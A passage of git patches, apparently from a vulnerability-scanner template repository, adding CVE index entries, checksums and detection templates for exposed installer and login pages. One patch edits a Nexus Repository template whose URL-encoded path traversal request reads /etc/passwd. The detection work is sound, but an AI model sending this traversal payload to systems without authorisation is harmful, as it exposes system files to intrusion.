request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"} {"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"} {"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"} +{"ID":"CVE-2022-34534","Info":{"Name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","Severity":"high","Description":"Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34534.yaml"} {"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"} {"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-34590.yaml"} {"ID":"CVE-2022-34753","Info":{"Name":"SpaceLogic C-Bus Home Controller \u003c=1.31.460 - Remote Command Execution","Severity":"high","Description":"SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-34753.yaml"} @@ -2020,6 +2022,7 @@ {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} +{"ID":"CVE-2023-2059","Info":{"Name":"DedeCMS 5.7.87 - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2059.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} {"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} @@ -2129,6 +2132,7 @@ {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} {"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} +{"ID":"CVE-2023-3077","Info":{"Name":"MStore API \u003c 3.9.8 - SQL Injection","Severity":"critical","Description":"The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3077.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} @@ -2296,6 +2300,7 @@ {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} +{"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} {"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} @@ -2364,6 +2369,7 @@ {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} +{"ID":"CVE-2024-21683","Info":{"Name":"Atlassian Confluence Data Center and Server - Remote Code Execution","Severity":"high","Description":"Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-21683.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} {"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"} {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} @@ -2406,9 +2412,11 @@ {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} +{"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a8bbfdcf41..fdd7707641 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -2ecfbdb4298145f0427a7bc3f0ccd192 +55d726c9b235a4147824c1f516d6ede1 From 2bf00c43f17f52b5e8ee361725a7710ec8f29b20 Mon Sep 17 00:00:00 2001 From: Gunther Royen Date: Wed, 29 May 2024 11:02:41 +0200 Subject: [PATCH 1524/1768] enlarged traversal path, this is often not long enough --- http/cves/2024/CVE-2024-4956.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 2481ee7b18..8da26616b5 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -30,7 +30,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers: - type: dsl From 53031f2ab27f23f43d24b2afb477252e316114a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 17:42:07 +0530 Subject: [PATCH 1525/1768] Create cubebackup-setup-installer.yaml --- .../cubebackup-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/cubebackup-setup-installer.yaml diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/cubebackup-setup-installer.yaml new file mode 100644 index 0000000000..55b903fb1c --- /dev/null +++ b/http/misconfiguration/cubebackup-setup-installer.yaml @@ -0,0 +1,31 @@ +id: cubebackup-setup-installer + +info: + name: CubeBackup Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed CubeBackup Setup page. + reference: + - https://www.cubebackup.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="CubeBackup setup" + tags: misconfig,install,exposure,cubebackup + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CubeBackup setup" + + - type: status + status: + - 200 From 9932f319513445bcc85483ee2d53ece8325d4c7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 15:04:01 +0000 Subject: [PATCH 1527/1768] Auto Generated Templates Checksum [Wed May 29 15:04:01 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1792f9bfa6..96efa4f5fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:cfc088634ae45324a8da7ad24935ca652af56005 -cves.json-checksum.txt:736f1e493b97aa3ed9087475630076e22ea04456 +cves.json:6eee1186277f72ac4416ed2435f40e2541bea763 +cves.json-checksum.txt:3eb64dc359a3fa01d30c701a2ad27aea9bb3b8bc dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3311,7 +3311,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 +http/cves/2024/CVE-2024-4956.yaml:d307ad589d80f512df4bfa2bc2f7f727eb32f050 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -8601,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aab4de2297091fcd9b0008bf2a1d84dcf4593c88 +templates-checksum.txt:696e9190411f7f7ecfff24945eade5e5c370d56a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3e953023cac97aeab39a02b8f93d4e09624eac3c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 15:05:42 +0000 Subject: [PATCH 1528/1768] Auto Template Signing [Wed May 29 15:05:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4956.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 8da26616b5..8b34fb7f1f 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -39,4 +39,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and -# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3fc0d77fbae2962a5f1baf5b9986fc4abe4ea968b3898fec35782a662cb3fbf022020a1ce16cea9d0dcfd42f0b7fe6550ada932bec3e3c8e4774c9254046ac4dfa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 491263d9417aa880e0770af13326307153cd6e10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 20:56:30 +0530 Subject: [PATCH 1529/1768] Create mura-cms-setup-installer.yaml --- .../installer/mura-cms-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/mura-cms-setup-installer.yaml diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml new file mode 100644 index 0000000000..97a45a968f --- /dev/null +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -0,0 +1,31 @@ +id: mura-cms-setup-installer + +info: + name: Mura CMS Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Mura CMS Setup page. + reference: + - https://www.murasoftware.com/mura-cms/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Mura CMS - Setup" + tags: misconfig,install,exposure,mura-cms + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mura CMS - Setup" + + - type: status + status: + - 200 From efd82d182e2498f8f1a1e10ef6eaed1d58482ea1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 22:51:03 +0530 Subject: [PATCH 1530/1768] Create pandora-fms-installer.yaml --- .../installer/pandora-fms-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/pandora-fms-installer.yaml diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml new file mode 100644 index 0000000000..4592bf3ccc --- /dev/null +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -0,0 +1,31 @@ +id: pandora-fms-installer + +info: + name: Pandora FMS Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Pandora FMS installation page. + reference: + - https://pandorafms.com/en/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Pandora FMS - Installation Wizard" + tags: misconfig,install,exposure,pandora-fms + +http: + - method: GET + path: + - "{{BaseURL}}/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Pandora FMS - Installation Wizard" + + - type: status + status: + - 200 From 644cc91b61f02bd049f86c00175cb8db38f2ebb5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:24:43 +0200 Subject: [PATCH 1531/1768] Add files via upload --- .../oracle-access-management.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/exposed-panels/oracle-access-management.yaml diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml new file mode 100644 index 0000000000..5916c37753 --- /dev/null +++ b/http/exposed-panels/oracle-access-management.yaml @@ -0,0 +1,40 @@ +id: oracle-access-management + +info: + name: Oracle Access Management Login Panel - Detect + author: righettod + severity: info + description: Oracle Access Management login panel was detected. + classification: + cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.title:"Oracle Access Management" + vendor: oracle + verified: true + tags: panel,oracle,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/oam/pages/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Login - Oracle Access Management" + - "/oam/server/auth_cred_submit" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' \ No newline at end of file From c41de4bf893e88a9630a6bbaf9b9447f11ab5ed5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:29:32 +0200 Subject: [PATCH 1532/1768] Add the reference entry --- http/exposed-panels/oracle-access-management.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 5916c37753..eb34017120 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -5,6 +5,8 @@ info: author: righettod severity: info description: Oracle Access Management login panel was detected. + reference: + - https://www.oracle.com/security/identity-management/access-management/ classification: cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* metadata: @@ -37,4 +39,4 @@ http: 